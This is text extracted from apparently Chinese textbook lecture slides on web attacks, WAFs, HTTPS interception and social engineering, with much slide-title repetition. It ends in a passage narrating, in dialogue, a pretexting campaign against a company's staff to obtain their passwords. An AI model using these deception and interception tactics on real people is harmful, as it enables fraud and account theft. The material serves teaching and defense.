6、不安全的加密存儲常見的問題：對敏感信息沒有加密；繼續(xù)使用已被證明加密強度不高的算法（MD5,SHA-1,RC3,RC4,etc.）；加密方法使用不安全，比如對加密口令的存儲不加保護；嘗試使用自己發(fā)明的加密方法（實踐證明這種方法比較糟糕！）。6、不安全的加密存儲示例CustomCodeAccountsFinanceAdministrationTransactionsCommunicationKnowledgeMgmtE-CommerceBus.Functions1用戶在Web表單中填寫信用卡號提交2由于商家的網(wǎng)關(guān)不可達(dá)，交易失敗，錯誤處理日志將問題詳細(xì)記錄下來4使用惡意代碼從日志文件中偷取數(shù)萬計的信用卡號Logfiles3日志文件可被相關(guān)IT職員訪問，用于程序調(diào)試6、防御不安全的加密存儲如非必要，不要保存敏感信息；確保所有的敏感信息都被加密，檢查敏感信息的歸檔過程和政策；只使用經(jīng)過證明的標(biāo)準(zhǔn)加密算法；小心存儲口令、證書等信息。7、URL訪問缺少限制

Frequently,anapplicationonlyprotectssensitivefunctionalitybypreventingthedisplayoflinksorURLstounauthorizedusers.AttackerscanusethisweaknesstoaccessandperformunauthorizedoperationsbyaccessingthoseURLsdirectly.OWASPDefinition

7、URL訪問缺少限制當(dāng)Web應(yīng)用缺少對某些URL的訪問限制，攻擊者可以直接在瀏覽器中輸入URL來訪問。比如：Add_account_form.php在顯示這個表單頁時要先對用戶的管理員角色進(jìn)行驗證；表單填好后發(fā)送給add_acct.php執(zhí)行添加帳號的功能；

如果不限制add_acct.php的直接訪問，攻擊者直接在瀏覽器中訪問該頁面，就繞過了權(quán)限檢查。7、防御缺少限制的URL訪問從需求階段就要制定詳細(xì)的安全策略；從頁面到每一個功能，都只由相應(yīng)的經(jīng)過認(rèn)證的角色來訪問；訪問控制策略越簡單越好。從早期做起！徹底地測試！進(jìn)行詳盡地測試保證訪問控制沒有被旁路；嘗試所有的非法訪問；測試時不要跟隨Web應(yīng)用的正常工作流；攻擊目標(biāo)網(wǎng)站域名注冊服務(wù)提供商

修改目標(biāo)網(wǎng)站域名記錄

申請網(wǎng)站證書

偽裝成目標(biāo)網(wǎng)站8、組合攻擊實現(xiàn)網(wǎng)站假冒攻擊目標(biāo)網(wǎng)站域名注冊服務(wù)提供商

修改目標(biāo)網(wǎng)站域名記錄

申請網(wǎng)站證書

偽裝成目標(biāo)網(wǎng)站8、組合攻擊實現(xiàn)網(wǎng)站假冒攻擊目標(biāo)網(wǎng)站域名注冊服務(wù)提供商

修改目標(biāo)網(wǎng)站域名記錄

申請網(wǎng)站證書

偽裝成目標(biāo)網(wǎng)站8、組合攻擊實現(xiàn)網(wǎng)站假冒通過查看的域名系統(tǒng)（DNS）記錄，發(fā)現(xiàn)指向的是馬來西亞的Internet地址：9攻擊者還從Let’sEncrypt獲得了的免費加密證書。題外話，Let’sEncrypt證書已經(jīng)被黑客用的極度泛濫了8、組合攻擊實現(xiàn)網(wǎng)站假冒此外，IP被解析到域名8、組合攻擊實現(xiàn)網(wǎng)站假冒1Web應(yīng)用體系結(jié)構(gòu)脆弱性分析常見Web應(yīng)用攻擊及防范內(nèi)容提綱2Web應(yīng)用防火墻WAF3有了網(wǎng)絡(luò)防火墻，為什么還不夠？WAFWeb應(yīng)用防火墻（WebApplicationFirewall,WAF）是一種專門保護Web應(yīng)用免受本章前面介紹的各種Web應(yīng)用攻擊的安全防護系統(tǒng)，對每一個HTTP/HTTPS請求進(jìn)行內(nèi)容檢測和驗證，確保每個用戶請求有效且安全的情況下才交給Web服務(wù)器處理，對非法的請求予以實時阻斷或隔離、記錄、告警等，確保Web應(yīng)用的安全性WAFWAF基本安全功能：防止常見的各類網(wǎng)絡(luò)攻擊，如：SQL注入、XSS跨站、CSRF、網(wǎng)頁后門等；防止各類自動化攻擊，如：暴力破解、撞庫、批量注冊、自動發(fā)貼等；阻止其它常見威脅，如：爬蟲、0DAY攻擊、代碼分析、嗅探、數(shù)據(jù)篡改、越權(quán)訪問、敏感信息泄漏、應(yīng)用層DDoS、盜鏈、越權(quán)、掃描等。WAF基本安全功能：WAF基本原理WAF主要提供對Web應(yīng)用層數(shù)據(jù)的解析，對不同的編碼方式做強制多重轉(zhuǎn)換還原為可分析的明文，對轉(zhuǎn)換后的消息進(jìn)行深度分析。主要的分析方法主要有兩類，一類是基于規(guī)則的分析方法，另一類是異常檢測方法WAFWAF部署WAF部署在Web服務(wù)器的前面，一般是串行接入，不僅在硬件性能上要求高，而且不能影響Web服務(wù)，同時還要與負(fù)載均衡、WebCache等Web服務(wù)器前的常見產(chǎn)品協(xié)調(diào)部署WAFWAF部署WAF的部署模式有三種：反向代理、透明代理、旁路。常用的是反向、透明兩種模式，因為旁路只有監(jiān)聽功能，不能對訪問進(jìn)行攔截、沒有防護能力，因此使用的較少。WAFWAF部署：反向代理WAF反向代碼WAF原始服務(wù)器用戶WAF部署：透明代理WAF透明代碼WAF原始服務(wù)器用戶WAF部署：WAFWAF部署WAFWAF部署WAF與網(wǎng)絡(luò)防火墻能一起部署嗎？WAF產(chǎn)品WAFWAFAWSWAFWAFWAF的安全性WAF的安全性如何探測、繞過WAF本章小結(jié)作業(yè)參考資料一、網(wǎng)站攻擊態(tài)勢（CNCERT）二、網(wǎng)站攻擊學(xué)習(xí)工具跟著WebGoat一起學(xué)習(xí)各種攻擊方法選擇提示對各種類型漏洞應(yīng)使用的漏洞攻擊程序顯示頁面各種隱藏的參數(shù)值顯示頁面的Cookies值漏洞和攻擊方法的課程學(xué)習(xí)計劃顯示頁面的Java源代碼跟著DVWA一起學(xué)習(xí)WheretoLearnMore三、HTTPS安全問題（段海新等研究成果）HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？有了HTTPS，通信就不會被支持嗎？HTTPS就安全了嗎？清華大學(xué)段海新教授團隊關(guān)于中間盒子主要研究成果HTTPS就安全了嗎？段海新教授ACMCCS2020HTTPS就安全了嗎？清華大學(xué)段海新教授：HTTPS就安全了嗎？進(jìn)一步閱讀“HTTPS劫持漫談：代理劫持與透明劫持”（/s/lRdVqBKlR708tGGXQxjUWA）了解HTTPS劫持原理HTTPS就安全了嗎四、監(jiān)聽HTTPS通信如何監(jiān)聽HTTPS通信？HTTPS劫持的核心原理：不安全的CA可以給任何網(wǎng)站進(jìn)行簽名，TLS服務(wù)器解密需要服務(wù)器私鑰和公鑰證書，然而這個不安全的CA可以提供用戶暫時信任的服務(wù)器私鑰和公鑰證書透明劫持（TransparentHTTPS）與代理劫持（ProxyHTTPS）擴展用自簽名證書偽造知名網(wǎng)站證書用自簽名證書偽造知名網(wǎng)站證書用自簽名證書偽造知名網(wǎng)站證書攻擊目標(biāo)網(wǎng)站域名注冊服務(wù)提供商

修改目標(biāo)網(wǎng)站域名記錄

申請網(wǎng)站證書

偽裝成目標(biāo)網(wǎng)站組合攻擊實現(xiàn)網(wǎng)站假冒攻擊目標(biāo)網(wǎng)站域名注冊服務(wù)提供商

修改目標(biāo)網(wǎng)站域名記錄

申請網(wǎng)站證書

偽裝成目標(biāo)網(wǎng)站組合攻擊實現(xiàn)網(wǎng)站假冒攻擊目標(biāo)網(wǎng)站域名注冊服務(wù)提供商

修改目標(biāo)網(wǎng)站域名記錄

申請網(wǎng)站證書

偽裝成目標(biāo)網(wǎng)站組合攻擊實現(xiàn)網(wǎng)站假冒通過查看的域名系統(tǒng)（DNS）記錄，發(fā)現(xiàn)指向的是馬來西亞的Internet地址：9攻擊者還從Let’sEncrypt獲得了的免費加密證書。題外話，Let’sEncrypt證書已經(jīng)被黑客用的極度泛濫了組合攻擊實現(xiàn)網(wǎng)站假冒代理劫持啟動代理服務(wù)器，瀏覽器配置代理服務(wù)器上網(wǎng)，在代理服務(wù)器上劫持、監(jiān)聽代理劫持啟動代理服務(wù)器，瀏覽器配置代理服務(wù)器上網(wǎng)，在代理服務(wù)器上劫持、監(jiān)聽以Fiddler劫持手機HTTPS流量為例代理劫持手機筆記本電腦（啟動Fiddler，開啟Wi-Fi熱點）Web服務(wù)器代理劫持代理劫持代理劫持代理劫持代理劫持代理劫持代理劫持代理劫持代理劫持瀏覽器無需設(shè)置代理，路由器直接將流量轉(zhuǎn)給中間人進(jìn)行HTTPS劫持透明劫持瀏覽器無需設(shè)置代理，路由器直接將流量轉(zhuǎn)給中間人進(jìn)行HTTPS劫持1.客戶端連接服務(wù)器；2.路由器重定向客戶端連接到中間人；3.中間人通過SNI獲知需要連接哪個具體的目標(biāo)網(wǎng)站；4.替換證書...成功劫持（同代理劫持）；透明劫持為什么要用到SNI透明劫持TLS1.2ClientHello消息服務(wù)器證書鎖定（SSL/TLSpinning）把服務(wù)器證書或其它安全憑證內(nèi)置在客戶端，在客戶端訪問服務(wù)器時會驗證服務(wù)器證書有沒有被替換常用于移動APP（如Twitter,Google系A(chǔ)PP）防HTTPS通信被劫持防止HTTPS被劫持最高安全等級：x509雙向認(rèn)證諸如WPA2企業(yè)級認(rèn)證EAP-TLS的認(rèn)證方式，很多系統(tǒng)（如網(wǎng)銀）都將TLS的雙向認(rèn)證作為最高標(biāo)準(zhǔn)、最高安全等級的認(rèn)證方式防止HTTPS被劫持防止HTTPS被劫持防止HTTPS被劫持防止HTTPS被劫持本PPT是機械工業(yè)出版社出版的教材《網(wǎng)絡(luò)攻防原理與技術(shù)（第3版）》配套教學(xué)PPT（部分內(nèi)容的深度和廣度比教材有所擴展），作者：吳禮發(fā)，洪征，李華波本PPT可能會直接或間接采用了網(wǎng)上資源或公開學(xué)術(shù)報告中的部分PPT頁面、圖片、文字，引用時我們力求在該PPT的備注欄或標(biāo)題欄中注明出處，如果有疏漏之處，敬請諒解。同時對被引用資源或報告的作者表示誠摯的謝意！本PPT可免費使用、修改，使用時請保留此頁。聲明第十二章社會工程學(xué)內(nèi)容提綱社會工程學(xué)常用技術(shù)2社工庫與社會工程學(xué)工具3防范社會工程學(xué)4概述1社會工程學(xué)人是核心要素IATF核心要素：人、技術(shù)和操作，其中人是信息體系的主體，是信息系統(tǒng)的擁有者、管理者和使用者，是信息保障體系的核心，是第一位的要素。“人”不僅是安全的終極目標(biāo)，也是安全的核心手段和最危險的攻擊面定義維基百科：社會工程是操縱他人采取特定行動或者泄露機密信息的行為。它與騙局或欺騙類似，故該詞常用于指代欺詐或詐騙，以達(dá)到收集信息、欺詐或訪問計算機系統(tǒng)的目的。大多數(shù)情況下，攻擊者與受害者不會面對面接觸社會工程學(xué)定義韋氏詞典：“社會(Social)”是指“社區(qū)中屬于或與生活、福利以及人際關(guān)系有關(guān)的”，“工程(Engineering)”是指“對物理、化學(xué)等純科學(xué)進(jìn)行實際應(yīng)用的藝術(shù)或科學(xué)”，組合起來的意思就是：社會工程學(xué)是一門藝術(shù)或者科學(xué)，它有技巧地誘導(dǎo)人們在生活中的某些方面采取某種行動。社會工程學(xué)定義Hadnagy：社會工程是一種操縱他人采取特定行動的行為，該行動不一定符合“目標(biāo)人”的最佳利益，其結(jié)果包括獲取信息、取得訪問權(quán)或讓目標(biāo)采取特定的行動。社會工程學(xué)定義更一般的定義：社會工程是一種利用人的弱點（例如人的本能反應(yīng)、好奇心、信任、貪婪等）進(jìn)行諸如欺騙、傷害來獲取利益的方法，簡單地說就是“誘騙”。社會工程學(xué)定義從網(wǎng)絡(luò)攻防的角度看：社會工程是操縱他人采取特定行動或者泄露機密信息的行為，該行動不一定符合“目標(biāo)人”的最佳利益，其結(jié)果包括獲取信息、取得訪問權(quán)或讓目標(biāo)采取特定的行動。社會工程學(xué)意義在當(dāng)前網(wǎng)絡(luò)安全防護技術(shù)越來越強，單位或組織越來越重視網(wǎng)絡(luò)安全防護系統(tǒng)建設(shè)的今天，純技術(shù)的網(wǎng)絡(luò)攻擊的難度越來越大，借助社會工程學(xué)實施網(wǎng)絡(luò)滲透攻擊成為了一種主流的網(wǎng)絡(luò)攻擊形態(tài)。APT攻擊過程中，就常常采用社會工程學(xué)的方法來實現(xiàn)攻擊目的。社會工程學(xué)/s/V0LwIpNNTjSCE2PtcT1hZw社會工程學(xué)社會工程學(xué)威瑞森的報告顯示，94%的惡意軟件通過電子郵件傳播，排名第一的社會工程攻擊是網(wǎng)絡(luò)釣魚社會工程學(xué)社會工程學(xué)內(nèi)容提綱社會工程學(xué)常用技術(shù)2社工庫與社會工程學(xué)工具3防范社會工程學(xué)4概述1社會工程主要是針對人的攻擊，因此，攻擊者或社會工程師（社會工程學(xué)的實施者）必須掌握心理學(xué)、人際關(guān)系學(xué)和行為學(xué)等知識和技能，以便收集和掌握實施入侵所需要的相關(guān)資料與信息、開展具體的攻擊行動，常見形式有偽裝、引誘、恐嚇、說服、反向社會工程等。常用技術(shù)偽裝成管理員或熟悉的人向用戶發(fā)送信息、打電話，或偽造知名Web站點（釣魚網(wǎng)站），如銀行、政府網(wǎng)站，讓用戶誤以為是真的網(wǎng)站而去訪問等，進(jìn)而達(dá)到攻擊的目的一、偽裝偽裝的原則或技巧盡可能了解要偽裝的目標(biāo)加入個人愛好會提高成功率練習(xí)方言或表達(dá)方式；不要低估打電話的作用偽裝越簡單，成功率越高偽裝必須自然為目標(biāo)提供合理的結(jié)論或下一步工作安排等一、偽裝偽裝網(wǎng)站一、偽裝偽裝網(wǎng)站URL中常見字符字母o與數(shù)字0一、偽裝偽裝網(wǎng)站URL中常見字符將英文字母a（o）替換為西里爾文（Cyrillic）字母а（о）或俄文字母а（о）一、偽裝偽裝網(wǎng)站URL中常見字符將英文字母a（o）替換為西里爾文（Cyrillic）字母а（о）或俄文字母а（о）一、偽裝一、偽裝偽裝網(wǎng)站URL中常見字符將大寫英文字母I替換為數(shù)字1將大寫Y替換成大寫字母V或反過來2020非冠疫情期間出現(xiàn)的：用cclc來偽裝（美國）疾控中心（centerfordiseasecontrol）的簡稱cdc，主要用于偽裝域名，如用偽裝成一、偽裝利用同一單詞不同形式來迷惑受害者。2018年，安全研究人員在Python軟件庫中發(fā)現(xiàn)了一個名為“Colourama”的盜竊加密貨幣的惡意Python軟件包，它仿冒的是Python軟件庫中下載排名前20的軟件包“Colorama”。惡意包名稱中的“Colour”與被仿冒的Python包名稱中的“Color”的意思是一樣的，只差一個字母，很具有迷惑性。盡管該惡意Python包上線不久就被發(fā)現(xiàn)，但在被發(fā)現(xiàn)之前還是有151個用戶已經(jīng)下載了該軟件包一、偽裝用相近單詞（清華校內(nèi)2021年底的一次測試）一、偽裝用相近單詞一、偽裝偽裝網(wǎng)站URL中常見字符用ASCII碼代替可見字符一、偽裝通過中獎、免費贈送禮品、有誘惑力的資料等內(nèi)容，引誘用戶打開網(wǎng)頁、郵件及附件、短信里的網(wǎng)絡(luò)鏈接等手段，實現(xiàn)木馬的傳播，進(jìn)而控制用戶的計算機；通過有獎?wù){(diào)查、比賽投票、贈送禮品等手段，要求填寫賬號、密碼、聯(lián)系方式等信息，來收集用戶的個人信息等二、引誘大到APT組織，小到社會上一些小黑客、不法分子，大量利用熱點事件作為誘餌文檔來實施社會工程攻擊，如南海問題、中美貿(mào)易戰(zhàn)、重大流行疾病、重大選舉、戰(zhàn)爭等二、引誘二、引誘二、引誘2020.2：APT組織利用肺炎疫情相關(guān)題材制作的釣魚郵件二、引誘2020.2：APT組織利用肺炎疫情相關(guān)題材制作的釣魚郵件二、引誘2020.7：APT組織利用肺炎疫情相關(guān)題材制作的釣魚郵件二、引誘2020.12：節(jié)日釣魚郵件二、引誘2020.12：節(jié)日釣魚郵件二、引誘清華段海新老師的一次經(jīng)歷二、引誘利用人們對安全、漏洞、病毒、木馬、黑客等內(nèi)容的敏感性，以權(quán)威機構(gòu)或系統(tǒng)管理員的面目出現(xiàn)，散布諸如安全警告、系統(tǒng)風(fēng)險之類的信息，使用危言聳聽的伎倆恐嚇欺騙計算機用戶，下載安全防護軟件、漏洞補丁，或執(zhí)行系統(tǒng)升級、更改口令等，進(jìn)而控制用戶的計算機或網(wǎng)絡(luò)應(yīng)用賬戶等三、恐嚇2016.3.19：希拉里競選團隊主席JohnPodesta收到的釣魚郵件三、恐嚇假冒網(wǎng)易郵箱管理員的身份給用戶發(fā)送的安全告警郵件三、恐嚇假冒網(wǎng)易郵箱管理員的身份給用戶發(fā)送的安全告警郵件三、恐嚇假冒網(wǎng)易郵箱管理員的身份給用戶發(fā)送的安全告警郵件三、恐嚇假冒郵件服務(wù)器軟件開發(fā)團隊三、恐嚇讓他人以你所期望的方式去行動、反應(yīng)、思考或建立信仰的過程，其中包含了情感和信仰等因素，同時需要熟悉心理學(xué)知識。要想成功地實現(xiàn)說服的目標(biāo)，應(yīng)遵循5項基本原則：目標(biāo)明確；構(gòu)建共識；洞悉并融入環(huán)境；靈活應(yīng)變；內(nèi)省并保持理性，不受自己的情感的影響四、說服安全專家Hadnagy在《社會工程》一書中給出的“主題樂園”案例四、說服反向社會工程（ReverseSocialEngineering）：攻擊者通過技術(shù)或者非技術(shù)的手段給網(wǎng)絡(luò)或者計算機應(yīng)用制造“問題”，使其目標(biāo)人員深信不疑。然后，誘使工作人員或者網(wǎng)絡(luò)管理人員透露或者泄漏攻擊者需要的信息，甚至執(zhí)行攻擊者希望的攻擊操作，如下載帶有病毒的文件，重啟服務(wù)等五、反向社會工程反向社會工程步驟：破壞(Sabotage)。對目標(biāo)系統(tǒng)實施初步攻擊并獲得基本權(quán)限后，留下錯誤信息，使用戶注意到信息，并嘗試獲得幫助。推銷(Marketing)。利用推銷術(shù)，確保用戶能夠向攻擊者求助，比如冒充是系統(tǒng)維護公司，或者在錯誤信息里留下求助電話號碼等。支持(Support)。攻擊者幫助用戶解決系統(tǒng)問題，在用戶沒有察覺的情況下，進(jìn)一步獲得所需信息或執(zhí)行想要的操作等五、反向社會工程案例一：過于自信的CEO案例分析案例二：讓用戶安裝木馬案例分析案例三：已知某公司一高管的QQ號，要求獲得其QQ密碼和郵箱密碼案例分析案例三（續(xù)）調(diào)研了解對方的企業(yè)文化公司背景，又注冊了一堆目標(biāo)公司相關(guān)行業(yè)的一些論壇調(diào)查這家公司目標(biāo)公司大概運營了4年之久，有不小的行業(yè)知名度滲透了一家目標(biāo)同類型公司。目的是挑個簡單的先進(jìn)去找些行業(yè)術(shù)語，規(guī)范文檔試探攻擊該公司網(wǎng)站，失??！案例三（續(xù)）攻擊步驟：以投資關(guān)系接觸目標(biāo)用戶利用利益誘惑方式深入了解目標(biāo)“競爭”心理社會工程學(xué)攻擊實施后續(xù)滲透及資料竊取案例三（續(xù)）周二上午10:00加對方QQ為好友E:你好,在論壇看到你發(fā)布你們公司一些在做的項目,想了解下,你這會方便么?T:你是說哪個項目?你想了解什么?E:htt://abbs/就是這個項目我想了解下你們的進(jìn)度，想知道什么時間可以測試產(chǎn)品。T:目前已經(jīng)可以測試了,你是那里的？做什么的？E:能先讓我測試下么？T:可以測試,不過你要提供你的信息給我。E:你是員工？還是PM？還是？？?T:PM？你到底是做什么的？案例三（續(xù)）E:呵呵，不好意思還沒自報家門我的電子名片：張**（總經(jīng)理助理）tel:150XXX333

河南省*****房地產(chǎn)開發(fā)集團email:E@91T:房地產(chǎn)?和我們沒什么關(guān)系。你怎么對我們項目有興趣？E:集團預(yù)計在年底前要擴展三個新的子公司其中包含****的業(yè)務(wù)但是因為一時間無法迅速構(gòu)建團隊，所以董事會想要以投資方式收購成熟的團隊和技術(shù)。T:大概明白了,不過我這會兒忙,你有什么事跟我助理談吧.E:沒關(guān)系等你有空了我再找你詳細(xì)聊吧你的名片？T:宋****(PM)tel:13323XX4

上海****信息科技有限公司email:T@91案例三（續(xù)）E:不好意思,我還需要問一個問題,你們公司股份制你是技術(shù)入股?T:嗯!有問題？E:只是先打聽下,我們本來是預(yù)計以不超過300萬收購一個團隊,如果你有信心帶出你現(xiàn)在的團隊并能做好管理那么你可以脫離你的公司,這樣豈不是更好?T:這個問題我沒考慮過你還是先測試下產(chǎn)品E:怎么測試?T:目前只能我們內(nèi)部測試,你想看看的話我為你演示吧(有錢就能有好的服務(wù),沒有白眼,沒有我在忙的推延)E:現(xiàn)在嗎?我這會兒不是很方便,等下有個會,晚上可以嗎?(換我擺譜)案例三（續(xù)）T:幾點?E:9點可以么？(說晚上9點是想知道他們所謂內(nèi)部測試是不是真實內(nèi)部測試,呵呵)T:……那時已經(jīng)下班了E:那你說個時間吧T:好吧那就9點吧(看來晚上9點也能演示,那不像是純內(nèi)部的測試,或者…VPN?)E:嗯好的那我先出去了T:再見晚上9點20我上網(wǎng)了…讓他等了一會兒測試他的耐心和脾氣呵呵T:你好!來了請聯(lián)系我T:你好!來了么？E:不好意思!堵車剛到家案例三（續(xù)）E:怎么看到測試？他發(fā)了個QQ遠(yuǎn)程協(xié)助…簡直…太幸運了呵呵這樣我了解的就更多啦只裝了個咖啡防病毒下面兩個網(wǎng)卡3個網(wǎng)卡圖標(biāo)…比較幸運（因為很有可能有一個是VPN）看了很多操作演示然后我就開始…繼續(xù)E:很不錯的,這個是你主要開發(fā)?T:是的E:你們負(fù)責(zé)開發(fā)的一共多少人？T:大概30人做研發(fā)的E:你個人有沒有考慮過獨立出來呢?如果你能帶團隊一起這樣考慮下吧?T:沒有考慮過案例三（續(xù)）E:那如果我明天匯報后有關(guān)投資的問題應(yīng)該聯(lián)系誰?T:這個你要聯(lián)系市場部的經(jīng)理也就是我們副總****E:哦我知道了

(看來這做技術(shù)的的確很專注…不吃葷腥…套不上他…套自己吧)E:如果是和你公司談的話有點…T:怎么？E:這筆投資并不小的你是知道了如果通過公司對你對我都沒有利益嘛…T:這個我不懂,你跟他談就好了.E:這樣吧你能不能先側(cè)面幫我打聽下看有沒有這方面合作的意向可以嗎？T:這沒問題明天我問下給你答復(fù)我要下了E:嗯好明天聯(lián)系案例三（續(xù)）第二天他告訴我他們那個副總包括老總也很感興趣…而且他們老總給我來了一個電話表示說我個人方面的利益可以放心邀請我去上海.我當(dāng)然不能過去,不過我也跟他們老總談了我很感興趣非常感興趣我們老板也說沒問題下周我們就去上海具體談判然后下周T就一直催我,我一直推說我這里有點小問題后來在他們老總也跟我聯(lián)系問我什么時間過去我告訴他現(xiàn)在有另外一家和你們做同樣產(chǎn)品的公司聯(lián)系我們到我們這里做了演示不過不是我聯(lián)系的是公司的一個市場部經(jīng)理牽頭的所以投資的事情暫緩。我并在通話中透漏了我的私欲“放心吧我不會讓那經(jīng)理得逞的!”也給了對方老總充分的安慰”如果有什么動態(tài)我會即時的通知你,希望*總能配合我”案例三（續(xù)）兩天后的早上，我撥了他老總的電話告訴他對方公司的演示我已經(jīng)看到了。告訴他們希望讓T能配合一下找找那家公司產(chǎn)品上的不足…這樣我有理由說服我的老板，T的老總說沒問題，上班就讓T聯(lián)系我.（我繞過了T讓他的老總告訴他這樣就更可信了,借刀殺人說的就這招吧!）這里我把之前滲透的那家公司的網(wǎng)站根目錄放置了一個名為/pdemo.rar的文件包里面塞了一些文檔